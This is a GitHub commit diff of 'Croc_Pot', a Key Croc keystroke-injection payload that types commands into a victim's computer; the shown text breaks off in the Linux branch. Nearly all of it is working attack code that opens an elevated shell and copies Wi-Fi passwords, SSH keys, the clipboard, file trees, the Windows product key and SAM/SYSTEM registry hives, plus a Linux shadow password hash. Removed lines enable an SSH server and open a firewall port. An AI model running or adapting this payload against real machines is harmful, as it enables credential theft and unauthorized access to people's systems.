Merge pull request #69 from spywill/master

update
This commit is contained in:
Peaks
2025-03-11 18:24:05 -04:00
committed by GitHub
3 changed files with 1511 additions and 1232 deletions



@@ -1,391 +1,354 @@
# Title: Croc_Pot Payload
# Description: Start Croc_pot.sh bash script automatically, scan takes about 30-40 sec to start because of OS detection
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
# This will collect some data off target (ip address, current user name, target host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder
# Author: Spywill
# Version: 1.4.1
# Version: 1.4.6
# Category: Key Croc
MATCH crocpot
#---> Edit KEYCROC_PASSWD_HERE
#---> Edit KEYCROC_PASSWD_BELOW
CROC_PW=hak5croc
#---> Check for target pc saved passwd run CrocUnlock payload first if not edit below
if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
#---> Save keycroc passwd in temp folder, used for starting Reverse SSH Tunnel with Target
echo "$CROC_PW" > /tmp/CPW.txt
#---> Check for target saved passwd, run Croc_Unlock payload first if not edit below
if [ -f "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
TARGET_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
#---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX
TARGET_PW=LINUX_PASSWD_HERE
fi
#---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC
echo "${CROC_PW}" > /tmp/CPW.txt
#---> Create Croc_Pot directories
CROC_POT_DIR=(/root/udisk/tools/Croc_Pot /root/udisk/loot/Croc_Pot)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
#---> Create Croc_Pot folders
if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
LED B
else
mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
fi
#---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
rm /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt
rm /root/udisk/tools/Croc_Pot/NumLock.txt
#---> remove existing OS detection
rm ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[1]}/sam ${CROC_POT_DIR[1]}/system
rm ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/target_email.txt
#---> Enter ethernet mode for OS detection
ATTACKMODE AUTO_ETHERNET
LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
GET TARGET_OS && echo "$TARGET_OS" | tee ${CROC_OS}
GET TARGET_IP && echo "$TARGET_IP" | tee -a ${CROC_OS}
GET TARGET_HOSTNAME && echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
#---> Keycroc built in functions, retrieve target Loot and save to tools/Croc_Pot/Croc_OS.txt
GET TARGET_OS && echo "$TARGET_OS" > "${CROC_POT_DIR[0]}/Croc_OS.txt"
GET TARGET_IP && echo "$TARGET_IP" >> "${CROC_POT_DIR[0]}/Croc_OS.txt"
GET TARGET_HOSTNAME && echo "$TARGET_HOSTNAME" >> "${CROC_POT_DIR[0]}/Croc_OS.txt"
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
QUACK DELAY 3000
#---> After OS detection case TARGET_OS value
case $TARGET_OS in
WINDOWS)
LED R
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
sleep 1
#---> Start windows powershell
Q GUI r ; sleep 1
Q STRING "powershell"
Q ENTER ; sleep 5
LED C
#---> Start windows powershell with administrator privileges
Q STRING "start-process powershell -verb runas ; exit"
Q ENTER ; sleep 3
Q LEFTARROW ; sleep 1
Q ENTER ; sleep 3
QUACK GUI m
QUACK GUI r ; QUACK DELAY 2000
QUACK STRING "powershell Start-Process powershell -Verb runAs"
QUACK ENTER ; QUACK DELAY 5000
QUACK ALT y ; QUACK DELAY 5000
#---> Check numlock state on or off
Q STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }"
Q ENTER ; sleep 2
QUACK STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }"
QUACK ENTER ; QUACK DELAY 2000
#---> Place keycroc usb drive into variable
Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
Q ENTER ; sleep 2
QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
QUACK ENTER ; QUACK DELAY 2000
#---> Save numlock state to tools/Croc_Pot/Numlock.txt
Q STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\NumLock.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append"
Q ENTER ; sleep 3
QUACK STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\NumLock.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Croc_OS_Target.txt\" -append"
QUACK ENTER ; QUACK DELAY 3000
#---> Ping network to look for Shark Jack
Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER ; sleep 3
QUACK STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\shark_ip.txt\" -append"
QUACK ENTER ; QUACK DELAY 3000
#---> Place Shark Jack IP into variable
Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\""
Q ENTER ; sleep 2
QUACK STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\shark_ip.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve packet squirrel MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\squirrel_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Ping network to look for Lan turtle
Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\""
Q ENTER ; sleep 3
QUACK STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle IP if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\turtle_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Place Lan turtle IP into variable
Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\""
Q ENTER ; sleep 2
#---> sed to remove powershell output "\r" endlines
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to return only readable character
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to remove powershell output first "?" character
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt)
#---> sed to replace "-" with ":"
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1
#----> Check with nmap SSH status of target pc
#----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22:
case $(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered') in
open)
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
closed)
Q STRING "Service sshd is Closed trying to Enable SSH Server" ; Q ENTER ; sleep 2
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
Q ENTER ; sleep 2
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
Q ENTER ; sleep 2
Q STRING "restart-service sshd"
Q ENTER ; sleep 2
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
filtered)
Q STRING "Service sshd is filtered trying to Enable SSH Server" ; Q ENTER ; sleep 2
Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
Q ENTER ; sleep 2
Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
Q ENTER ; sleep 2
Q STRING "restart-service sshd"
Q ENTER ; sleep 2
Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
Q ENTER ;;
*)
Q STRING "Service sshd unknow" ; Q ENTER ; sleep 1 ;;
esac
sleep 6 ; Q ENTER ; sleep 2 ;;
QUACK STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\turtle_mac.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\bunny_mac.txt\""
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"loot\Croc_Pot\SSH\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target E-mail, Unreliable
QUACK STRING "\$TARGET_EMAIL = Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Last 1 | Select-Object -ExpandProperty PrimaryOwnerName; if (-not \$TARGET_EMAIL) {\$TARGET_EMAIL = (Get-WmiObject -Class \"Win32_OperatingSystem\").RegisteredUser}; if (\$TARGET_EMAIL -match '^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})\$') {\"\$TARGET_EMAIL\" | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\target_email.txt\"}"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target, windows product key
QUACK STRING "(Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey | out-file -encoding UTF8 \"\$MOUNT_POINT\loot\Croc_Pot\Windows_ProductKey.txt\""
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target file Structure
QUACK STRING "tree /f /a | out-file -encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\Target_File_Structure.txt\""
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target registry hives
QUACK STRING "reg export HKEY_LOCAL_MACHINE\SAM (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"); reg export HKEY_LOCAL_MACHINE\SYSTEM (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\")"
QUACK ENTER ; QUACK DELAY 45000
QUACK STRING "Compress-Archive -Path (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"), (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\") -DestinationPath (Join-Path -Path \$env:TEMP -ChildPath \"registry_archive.zip\") -Force"
QUACK ENTER ; QUACK DELAY 35000
QUACK STRING "Move-Item -Path (Join-Path -Path \$env:TEMP -ChildPath \"registry_archive.zip\") -Destination (Join-Path -Path \$MOUNT_POINT -ChildPath \"\loot\Croc_Pot\registry_archive.zip\") -Force -ErrorAction SilentlyContinue"
QUACK ENTER ; QUACK DELAY 8000
QUACK STRING "Remove-Item -Path (Join-Path -Path \$env:TEMP -ChildPath \"SAM.reg\"), (Join-Path -Path \$env:TEMP -ChildPath \"SYSTEM.reg\")"
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve content of the clipboard
QUACK STRING "Get-Clipboard | Tee-Object -FilePath \"\$MOUNT_POINT\tools\Croc_Pot\Target_Clipboard.txt\" -append"
QUACK ENTER ; QUACK DELAY 2000
;;
MACOS)
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
LED G ; sleep 1
LED G ; QUACK DELAY 1000
#---> Start mac os terminal
Q GUI-SPACE ; sleep 1
Q STRING "terminal"
Q ENTER ; sleep 1 ;;
QUACK GUI-SPACE ; QUACK DELAY 1000
QUACK STRING "terminal"
QUACK ENTER
;;
LINUX)
#---> Enter Storage mode on keycroc
ATTACKMODE HID STORAGE
LED B ; sleep 3
LED B
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
case $TARGET_HOSTNAME in
raspberrypi)
#---> Start Raspberry pi 4 LXTerminal
Q CONTROL-ALT-d
Q CONTROL-ALT-t
sleep 2
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
Q ENTER ; sleep 1
QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc/tools/Croc_Pot"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "MOUNT_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
QUACK ENTER ; QUACK DELAY 2000
#---> Check numlock state on or off
Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt"
Q ENTER ; sleep 1
if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then
Q NUMLOCK
QUACK STRING "cat /sys/class/leds/input*::numlock/brightness | uniq | tee \$MOUNT_POINT/NumLock.txt"
QUACK ENTER ; QUACK DELAY 2000
if [ "$(sed -n 1p ${CROC_POT_DIR[0]}/NumLock.txt)" = 0 ]; then
QUACK NUMLOCK
sleep 2
fi
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "whoami | tee \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP, MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "ip -o link show | awk '/wlan/{print \$2}' | cut -d':' -f1 | head -n1 | xargs -I{} sh -c 'ip addr show {} | awk \"/inet / {print \\\$2}\" | cut -d/ -f1; ip link show {} | awk \"/ether/ {print \\\$2}\"' | tee -a \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "sudo grep -H -E 'ssid=|psk=' /etc/NetworkManager/system-connections/* | sed 's|/etc/NetworkManager/system-connections/||' | sed 's|.nmconnection:| |' | awk 'NR%2{printf \"%s\n\", \$2; next} {printf \"%s\n\", \$2}' | tee -a \$MOUNT_POINT/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP, MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "ping -c 1 -w 1 shark.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 && arp -n shark.lan | awk '/^[0-9]/ {print \$3}' | tee \$MOUNT_POINT/shark_ip.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve packet squirrel IP, MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "arp -n squirrel.lan | awk '/^[0-9]/ {print \$3}' && ping -c 1 -w 1 squirrel.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 | tee \$MOUNT_POINT/squirrel_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve turtle IP, MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "ping -c 1 -w 1 turtle.lan | grep -oP '(\d{1,3}\.){3}\d{1,3}' | head -n 1 && arp -n turtle.lan | awk '/^[0-9]/ {print \$3}' | tee \$MOUNT_POINT/turtle_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee \$MOUNT_POINT/bunny_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "sudo cp -fr ~/.ssh/. \$MOUNT_LOOT/SSH/"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target file Structure
QUACK STRING "tree -f -a | tee \$MOUNT_POINT/Target_File_Structure.txt > /dev/null"
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1 ;;
${TARGET_HOSTNAME})
#---> Start mate-terminal -->Parrot OS<--
Q ALT F2
sleep 1
Q STRING "mate-terminal"
Q ENTER ; sleep 1
#---> Check numlock state on or off
